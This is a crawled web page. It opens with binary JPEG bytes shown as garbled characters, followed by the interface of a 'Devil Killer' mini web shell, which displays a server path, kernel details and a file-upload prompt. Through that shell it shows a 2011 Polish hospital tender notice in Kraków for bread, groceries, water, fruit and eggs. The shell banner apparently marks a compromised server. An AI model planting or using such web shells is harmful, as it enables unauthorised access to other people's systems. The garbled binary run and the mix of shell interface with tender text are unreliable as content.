JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111202/409638-N-2011.html

<p class="kh_header"><b>Kraków: DOSTAWy ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 409638 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWy ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET nr I.

LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Chleb mieszany żytnio-pszenny, krojony /1 szt. a  0.6 kg/
Termin przydatności do spożycia 4 dni   	1581000-6	20 000kg 
				
2.	Bułka pszenna  /1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	12 000 kg				
3.	Bułka graham  / 1 szt. a 0.05 kg/
Termin przydatności do spożycia 1 dzień   	15811400-0	    1 200kg
				
4.	Pączki  /1 szt. a 0,15kg/
Termin przydatności do spożycia 1 dzień    	15812000-3	     60kg    
				
5.	Babka drożdżowa /1szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      70kg
				
6.	Ciasto piaskowe  /1 szt. a 0.5 kg/
Termin przydatności do spożycia 4 dni    	15812000-3	      120 kg
				
7.	Makowiec / 1 szt. a 1 kg/ 
Termin przydatności do spożycia  4 dni   	15812000-3	       25kg
				
8.	Bułka tarta / 1 op. a 1 kg/
(opakowanie zbiorcze 10 kg). 
Termin przydatności do spożycia 30 dni    
	15811400-0	     520kg				
9.	Drożdżówka z nadzieniem  wykończona kruszonką o masie jednostkowej 100g,                                                                  Termin przydatności do spożycia 2 dni	15812100-4 	100 kg				
RAZEM:			


PAKIET nr  II.

LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Cukier kryształ /a1 kg/                 (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia  24 miesiące   	15831000-2	  700 op.				
2.	Mąka pszenna typ 500 /a1 kg/      (opakowanie zbiorcze 10 kg) Termin przydatności do spożycia  12 miesięcy   
	15612100-2	  480 op.
				
3.	Kasza manna /a1 kg/                    (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia  6 miesięcy   	03211900-2	  120 op.				
4.	Płatki owsiane /a1 kg/                  (opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia 6 miesięcy    	15613380-5	61 op.
				
5.	Mąka ziemniaczana /a 0.5 kg/     (opakowanie zbiorcze 5 kg)
Termin przydatności do spożycia 12 miesięcy    	15620000-0	22op.
				
9.
	Kakao /a0.1 kg/                             (opakowanie zbiorcze 1.20 kg) Termin przydatności do spożycia  18 miesięcy   	15841000-5
	6 op.
				
							
10.	Budyń bez cukru-śmietankowy          /a 0.06 kg/                                            (opakowanie zbiorcze 1.5 kg)     
  Termin przydatności do spożycia 12 miesięcy    	15332200-6	107 p.				
11.	Galaretka owocowa- różne smaki  typu NESTLE /a0.075kg/                                         (opakowanie zbiorcze 1.65kg )
Termin przydatności do spożycia 12 miesięcy    	15332240-8	34 op.
				
12. 	Makaron 2 -jajeczny różny(nitki, łazanki, kolanka, muszelki, świderki) /a1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia       6 miesięcy	15613300-1	240op.
				
13.	Kasza jęczmienna perłowa średnia /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia     6 miesięcy	03211900-2	105 op.
				
14.	Kasza gryczana /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia     6 miesięcy	03211900-2	22 op.
				
15.	Groch łuskany - połówki /a 0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia   12 miesięcy	03212213-6	12 op.
				
16.
	Fasola  JAŚ - duży /a0.5 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia   12 miesięcy	03221210-1	32 op.				
17.	Ryż długoziarnisty biały /a 1 kg/
(opakowanie zbiorcze 10 kg)
Termin przydatności do spożycia      12 miesięcy 	15614100-6	290 op.				
18.
	Pasta pomidorowa 30%   /a0.85 kg/opakowanie metalowe                           (opakowanie zbiorcze 6.80kg)
Termin przydatności do spożycia    12 miesięcy	15331134-5	156 op.				
19.
	Sok pomidorowy / a1 L /szt./
(opakowanie zbiorcze 12 szt.)
Termin przydatności do spożycia       6 miesięcy	15322100-2	160 op.				
20.	Sok owocowy  bez cukru /a1 L/szt./
(opakowanie zbiorcze 12 L/szt.)
Termin przydatności do spożycia            6 miesięcy	15321000-4	8 op.				
21.
	Papryka konserwowa /a0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            18 miesięcy	15331136-9	120 op.				
22.	Ogórek konserwowy / a 0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia            18 miesięcy	15331000-7	126 op.				
23.	Fasolka szparagowa,- konserwowa /a 2.6 kg/
Luzem (puszka 2.60 kg)
Termin przydatności do spożycia            12miesięcy	15331131-4	490 puszek.				
24.	Groszek konserwowy /a0.4 kg/
( opakowanie zbiorcze  4 kg)
Termin przydatności do spożycia            18 miesięcy	15331400-1	125 op.				
25.	Kukurydza konserwowa /a 0.4kg/
(opakowanie zbiorcze 4 kg) 
Termin przydatności do spożycia            18 miesięcy	15331400-1	72 op.				
26.	Musztarda kremowa o smaku łagodnym /a 0.2 kg/
(opakowanie zbiorcze 2 kg)_
Termin przydatności do spożycia            6 miesięcy	15871250-1	216 op.				
27.	Keczup łagodny /a0.45 kg/
(opakowanie zbiorcze  7.2 kg)
Termin przydatności do spożycia            6 miesięcy	15871123-5	86 op.				
28.	Olej rzepakowy  /a1L/szt./
(opakowanie zbiorcze 15 L /szt.)
Termin przydatności do spożycia            6 miesięcy	15411100-3	133 op.				
29.
 	Pieczywo ryżowe naturalne              /a 0.10kg/
(opakowanie zbiorcze  2.00 kg)
Termin przydatności do spożycia            6 miesięcy	15821130-9	18 op.				
30.
	Sucharki  /a0.29kg/
(opakowanie zbiorcze 5.8 kg)
Termin przydatności do spożycia            6 miesięcy	15821150-5	55 op.				
31.	Herbatniki słodkie  z marmoladą /a0.16 kg/
(opakowanie zbiorcze  3.2 kg)
Termin przydatności do spożycia            6 miesięcy	15821200-1	5 op.				
32.
	Biszkopty wrocławskie /a 0.12 kg/
(opakowanie zbiorcze 2.4 kg)
Termin przydatności do spożycia            6 miesięcy	15820000-2	170 op.				
33.
	Żelatyna spożywcza  wieprzowa     /a 0.05kg/
(opakowanie zbiorcze  1.5 kg)
Termin przydatności do spożycia            6 miesięcy	03142300-1	10 op.				
34.
	Dżem z czarnej porzeczki /a 0.9 kg/
(opakowanie zbiorcze 7.2 kg) 
Termin przydatności do spożycia            6 miesięcy	15332293-4	85 op.				
35.	Marmolada wieloowocowa             /a0.9 kg/
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            12  miesięcy	15332230-5	10 op.				
36.	Powidło śliwkowe /a0.3kg/
(opakowanie zbiorcze 2.7 kg)
Termin przydatności do spożycia            12  miesięcy	15332270-7	120 op.				
37.	Miód naturalny /a0.9 kg)
(opakowanie zbiorcze 7.2 kg)
Termin przydatności do spożycia            12  miesięcy	03142100-9	28 op.				
38.	Maggi  do zup w płynie typu NESTLE w szklanych kwadratowych butelkach /a1L/szt./
(opakowanie zbiorcze  6 L/szt.)
Termin przydatności do spożycia           18  miesięcy	15870000-7	106 op.				
39.	Kucharek  do potraw /a1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia           12 miesięcy	15893000-4	30 op.				
40.	Przyprawa do drobiu /a 1 kg/
(opakowanie zbiorcze 15 kg)
Termin przydatności do spożycia            12 miesięcy	15872000-1	  3op.				
41	Pieprz naturalny mielony /a1. kg/
Luzem
Termin przydatności do spożycia           18  miesięcy	15870000-7	  35kg				
42.	Pieprz ziołowy /a0.02kg/
(opakowanie zbiorcze 0.5 kg
Termin przydatności do spożycia            18 miesięcy	15872000-1	  8 op.				
43.	Papryka słodka mielona /a1 kg/
Luzem
Termin przydatności do spożycia    18  miesięcy	15872000-1	  15 kg				
44.	Liść laurowy /a 1 kg/
Luzem
Termin przydatności do spożycia           18 miesięcy	15872000-1	   4 kg				
45.	Kminek  /a 1.kg /
Luzem
Termin przydatności do spożycia           18  miesięcy	15872000-1	  11 kg				
46.	Ziele angielskie /a0.02 kg/
(opakowanie zbiorcze 0.5 kg)_
Termin przydatności do spożycia             18 miesięcy	15872000-1	  20 op.				
47.	Kwasek cytrynowy /a 1 kg /
Luzem
Termin przydatności do spożycia            18 miesięcy	15800000-6	  55kg				
48.	Majeranek /a 0.2 kg /
(opakowanie zbiorcze 1 kg) 
Termin przydatności do spożycia            18 miesięcy	15872000-1	    10 op.      				
49.	Ocet spirytusowy /a 0.5 L/szt./
(opakowanie zbiorcze 10 L)
Termin przydatności do spożycia            18 miesięcy	15871100-5	  44 op.				
50.	Żurek /a 0.5 L /
(opakowanie zbiorcze 6 L)
Termin przydatności do spożycia            30 dni	15610000-7	  100 op.				
51.	Chrzan tarty w occie / a0.26 kg/    
(opakowanie zbiorcze 3.90 kg)
  Termin przydatności do spożycia            90 dni	15871000-4	  130 op.				
52.	Zaprawa cytrynowa /a1L/szt./
(opakowanie zbiorcze 6 L/szt.)
  Termin przydatności do spożycia            18  miesięcy	15871200-6	   33 op.				
53.	Sól jodowana /a 1 kg/
(opakowanie zbiorcze 25 kg)
  Termin przydatności do spożycia            18  miesięcy	15872400-5	   80 op.				
54.	Cynamon /a 0.015kg/
(opakowanie zbiorcze 0.375 kg)
Termin przydatności do spożycia            18  miesięcy	15872000-1	     8 op.				
55.	Majonez delikatesowy /a 0.4 kg/ 
(opakowanie zbiorcze 3.20kg)
Termin przydatności do spożycia            30 dni	15871273-8	  85 op.				
56.	Kisiel owocowy /a0.04kg/
(opakowanie zbiorcze   1.2 kg)
Termin przydatności do spożycia            6 miesięcy	15800000-6	  30 op.				
57.	Cukier wanilinowy /a 0.032/
Opakowanie zbiorcze  0.8 kg 
Termin przydatności do spożycia            6 miesięcy	15830000-5	10op.				
58.	Mleko w proszku -  zawartość tłuszczu 26%    /a0.4 kg/
(opakowanie zbiorcze 4  kg)
Termin przydatności do spożycia            6 miesięcy	15511700-0	5 op.				
59.	Śliwka suszona/ a0.20 kg/                                opakowanie zbiorcze 1.20 kg                                                termin przydatności do spożycia              12 miesięcy	15332410-1	  5op.				
60.	cukier puder /a0.5 kg/,                                 opakowanie zbiorcze 5 kg
Termin przydatności do spożycia  24 miesiące   	15831000-2	6op.				
61.	Proszek do pieczenia /a0.036 kg/ (opakowanie zbiorcze 0.90 kg) termin przydatności do spożycia 12 miesięcy		8 op.				
62.	pieczarka marynowana/a0.760 kg/ 
(opakowanie zbiorcze 6.08 kg) termin przydatności do spożycia 12 miesięcy		28 op.				
63.	rodzynki sułtańskie /a 010 kg/ (opakowanie zbiorcze 1.20 kg)
termin przydatności do spożycia 12 miesięcy		3op.				
64.	koncentrat buraczany /a 300ml/ pakowany w butelki szklane - 0.38 kg, (opakowanie zbiorcze 5.70 kg
termin przydatności do spożycia 12 miesięcy
		12 op.				
65.	pieprz naturalny w ziarenkach /a0.02/                                                        (opakowanie zbiorcze 0.50 kg),                                                                                               termin przydatności do spożycia 6 miesięcy		5 op.				
66.	susz owocowy (mieszanka) /a0.25 kg/ opakowanie zbiorcze 3.00 kg
termin przydatności do spożycia 6 miesięcy
		2 op. 				
RAZEM			

PAKIET nr III.

LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1	Kawa zbożowa /a 0.5 kg/             (opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia  12 miesięcy	15862000-8	86 op.				
2	Kawa naturalna ziarnista                    /a1 kg/   I kl.                                                    (opakowanie zbiorcze 6 kg)
Termin przydatności do spożycia  18 miesięcy	15861100-2	6op.				
3	Kawa naturalna rozpuszczalna   /a 0.2 kg/                                                  (opakowanie zbiorcze 2.40 kg)
Termin przydatności do spożycia 18 miesięcy	15861000-1	2 op.				
4	Herbata liściasta  czarna  /a0.1 kg/
(opakowanie zbiorcze 2 kg)
Termin przydatności do spożycia18 miesięcy	15863200-7	90 op.				
5	Herbata w saszetkach  czarna ze sznureczkiem /a200g/
(opakowanie zbiorcze 0.80 kg)
Termin przydatności do spożycia    18 miesięcy	15841000-3	20 op.
				
6	Herbata w saszetkach zielona                           /a50 g/ (opakowanie zbiorcze  0.20 kg) Termin przydatności do spożycia 18 miesięcy	15863100-6	10 op.
				
7	Herbata   owocowa  /a0.1 kg/
(opakowanie zbiorcze 2 kg)
Termin przydatności do spożycia18 miesięcy     	15863200-7	 90 op.				
RAZEM:  			

  
PAKIET nr IV

LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1.	Ryba wędzona Makrela luz
(opakowanie zbiorcze 3 kg)
Termin przydatności do spożycia 7 dni	15234000-7	46 op.				
2.	Śledź marynowany w zalewie octowej (opakowanie zbiorcze 4 kg)
Termin przydatności do spożycia       21 dni	03311300-5	35 op.				
3.	Konserwa rybna - śledź w sosie pomidorowym /a0.17 kg/szt./
(opakowanie zbiorcze 4.08 kg/24 szt.)
. Termin przydatności do spożycia   24 miesiące    	15241200-1	25 op.				
	                             RAZEM:
			

PAKIET nr V. 

LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
 kwota netto
 za j.m.	
wartość netto 	
VAT	
wartość brutto
1. 	Mieszanka kompotowa /a 2.5 kg/
luz
termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.				
2.	Szpinak mrożony - mielony       /a2,5 kg/ luz                                                                             termin przydatności do spożycia 12 miesięcy	15331170-9	700 op.				
3.	Filet mrożony -  MINTAJ          25% glazury /a5 kg/ luz
termin przydatności do spożycia 12 miesięcy	03310000-5	  400 op.				
4.	Kalafior  mrożony /a2.50 kg /   luz
termin przydatności do spożycia 12 miesięcy	03221420-6	120 op.				
5.
	Brokuł  mrożony  /a 2.5 kg/      luz
termin przydatności do spożycia 12 miesięcy 	03221430-9	180op.				
RAZEM:
			


PAKIET nr VI
Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za  j.m.	
wartość netto	
VAT	
wartość brutto
1.	Naturalna woda niegazowana 
BUTLA 19 L wraz z nieodpłatną dzierżawą 14 sztuk dystrybutorów , oraz nieodpłatną konserwacją w/w urządzeń	15981000-8	200 szt.				
RAZEM:			



PAKIET nr VII
Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za j.m.	
wartość netto	
VAT	
wartość brutto
1.	Naturalna woda mineralna gazowana PET 0.5 L (opakowanie zbiorcze 6 L)	15981000-8	30 op.				
2.	Naturalna woda mineralna niegazowana PET 0.5 L                       (opakowanie zbiorcze 6L)	15981000-8	30 op.				
3.	Naturalna woda mineralna gazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	3 500 op.				
4.	Naturalna woda mineralna niegazowana PET 1.5 L (opakowanie zbiorcze 9 L)	15981000-8	500 op.				
                                                                                 RAZEM:			




PAKIET nr VIII
Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	
Kod CPV	
Ilość / j.m.	
kwota netto
za j.m.	
wartość netto	
VAT	
wartość brutto
1.	Pomarańcza                                                / waga 1 szt. =około 250g/, (opakowanie zbiorcze 5 -  10 kg)	03222220-1	800  kg				
2.	Grapefruit                                                     /waga 1 szt. = około 400g/, (opakowanie zbiorcze 9 - 18 kg) 	03222230-4	700  kg				
3.	Mandarynka                                          / waga 1 szt. = około 150g/,                             (opakowanie zbiorcze 4.5 - 12 kg)		50  kg				
4.	Cytryna                                            (opakowanie zbiorcze 1 - 5 kg)	03222210-8	110  kg				
                                                                                 RAZEM:			

PAKIET nr IX.
Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość / j.m.	Ilość / j.m.	wartość netto	VAT	wartość brutto
1.	Jaja świeże spożywcze klasy A    (L - jaja określane w kategorii wagowej jako duże, ważące od 63 d0 73g)
	03142500-3	45360 szt.				
Razem:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Posiada uprawnienia do wykonywania określonej i przewidzianej zamówieniem działalności lub czynności jeżeli:
1.1.	Jest zarejestrowany we właściwym rejestrze lub wpisany do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
1.2.	Posiada zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej lub organu Inspekcji Weterynaryjnej - na podstawie art. 62 ust. 1 pkt 4 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienie ( Dz. U. 171,poz. 1225 z późn. zmianami) o ile dotyczy;
1.3.	Posiada wdrożony system HACCP o ile dotyczy;
1.4.	Posiada zgłoszoną działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno - spożywczymi do Wojewódzkiego Inspektora Jakości Handlowej Artykułów Rolno - Spożywczych, zgodnie z art. 12 ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych ( Dz. U. z 2005 r. 
Nr 187, poz. 1577 ze zm.) o ile dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje potencjałem technicznym wykonania zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje osobami zdolnymi do wykonania zamówienia poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, poprzez wykazanie tego w oświadczeniu Wykonawcy, w trybie art. 44 ustawy, dotyczącego spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy. 3.1. przedstawi w dniu podpisania umowy polisę ubezpieczeniową od odpowiedzialności cywilnej (deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Wykonawcę . Wartość polisy winna być równa lub wyższa sumie wartości zawieranej umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	  Wypełniony  FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2)	  Wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA według ZAŁĄCZNIKANR 1 do SIWZ.
